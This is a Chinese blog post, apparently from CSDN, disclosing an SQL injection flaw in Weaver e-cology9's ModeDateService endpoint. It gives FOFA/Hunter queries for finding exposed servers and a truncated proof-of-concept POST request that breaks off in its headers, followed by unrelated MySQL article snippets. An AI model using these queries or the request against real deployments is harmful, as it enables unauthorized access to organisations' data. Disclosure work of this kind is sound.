首页 > 数据库 >泛微ecology9 ModeDateService 存在SQL注入漏洞

泛微ecology9 ModeDateService 存在SQL注入漏洞

时间:2024-08-29 11:53:51浏览次数:10  
标签:ModeDateService 漏洞 app cology ecology9 application SQL 泛微

一、漏洞介绍

泛微e-cology是⼀款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能
管理和移动办公。泛微e-cology9 ModeDateService接口存在SQL注入漏洞。

二、影响版本

泛微ecology9

三、网络测绘

fofa: app="泛微-协同商务系统"
hunter: app.name=="泛微 e-cology 9.0 OA"
在这里插入图片描述
POC:

POST /services/ModeDateService HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=

标签:ModeDateService,漏洞,app,cology,ecology9,application,SQL,泛微
From: https://blog.csdn.net/weixin_46944519/article/details/141674159

相关文章

  • Windows下安装MySQL详细教程
    Windows下安装MySQL详细教程1、安装包下载  2、安装教程(1)配置环境变量(2)生成data文件(3)安装MySQL(4)启动服务(5)登录MySQL(6)查询用户密码(7)设置修改用户密码(8)退出 3、解决问题1、安......
  • 用MySQL的GROUP_CONCAT函数轻松解决多表联查的聚合问题
    大家好呀,我是summo,最近遇到了一个功能需求,虽然也是CURD,但属于那种比较复杂一点的CURD,话不多说,我们先看一下需求。需求如下:有三张表,学生表、课程表、学生课程关联表,关联关系如下图:要求实现的功能:支持输入名称模糊查询,可以是学生名称也可以是课程名称,但只有一个输入框;要求以......
  • MySQL 延迟从库介绍
    前言:我们都知道,MySQL主从延迟是一件很难避免的情况,从库难免会偶尔追不上主库,特别是主库有大事务或者执行DDL的时候。MySQL除了这种正常从库外,还可以设置延迟从库,顾名思义就是故意让从库落后于主库多长时间,本篇文章我们一起来了解下MySQL中的延迟从库。延迟从库介绍延迟复......
  • 【MySQL】binlog常见问题
    https://mp.weixin.qq.com/s/n9vWkee2N-gpXpOHIYtRJg关于binlog,这里常见的问题如下:binlog是什么binlog的配置和查看binlog的类型binlog如何数据恢复binlog是逻辑日志还是物理日志binlog的作用binlog是什么binlo(binarylog),是MySql的二进制日志文件,这个文件记录了我们所......
  • MySQL - [19] 关于个人负债为主题的数据库设计
    天生我材必有用,千金散尽还复来。 一、开发环境序号名称版本描述1JDK1.8.0_4012数据库MySQLCommunityServer8.0.373数据库客户端DBeaver21.0.2.2021040420404开发工具IntelliJIDEACommunityEdition2023.3.4  二、数据库设计2.1、......
  • Mysql超详细基础干货——几分钟带你认识mysql
    Mysql数据库事务的特性binlog、redolog和undologMySQL事务实现原理leftjoin、rightjoin和innerjoin区别?说一下mysql的行锁和表锁索引有哪些数据结构Innodb和Myisam存储引擎区别为什么索引底层实现选择B+uuid为什么不适合做主键?1万数据未支付,已支付,支付失败状......
  • MySQL联表查询
    按功能分内连接等值连接非等值连接自连接外连接左外连接右外连接全外连接交叉连接1.内连接(INNERJOIN)获取所有的员工名和其对应的部门名SELECTe.last_name,d.department_nameFROMemployeeseINNERJOINdepartmentsd ONe.department_id=d.departm......
  • 数据分页的艺术:SQL中的高效实现策略
    数据分页的艺术:SQL中的高效实现策略在处理大量数据时,一次性显示所有记录不仅效率低下,而且用户体验差。因此,分页显示成为了Web和应用程序开发中的一项基本需求。SQL作为数据查询语言,提供了多种实现分页的方法。本文将详细探讨如何在不同数据库系统中使用SQL实现数据的分页显......
  • SQL的化身术:使用AS为列或表指定别名
    标题:SQL的化身术:使用AS为列或表指定别名在SQL查询的世界里,别名是一个强大的工具,它允许我们为列或表提供一个临时的名字,以使查询结果更加清晰或简化复杂的查询。AS关键字是指定别名时最常用的方法。本文将深入探讨如何使用AS为列或表指定别名,并提供实际的代码示例,帮助你在SQ......
  • MySQL修改密码
    第一种方式:最简单的方法就是借助第三方工具NavicatforMySQL来修改,方法如下:1、登录mysql到指定库,如:登录到test库。2、然后点击上方“用户”按钮。3、选择要更改的用户名,然后点击上方的“编辑用户”按钮。4、出现如图界面,输入新密码,并确认新密码,点击“保存”按钮即可。......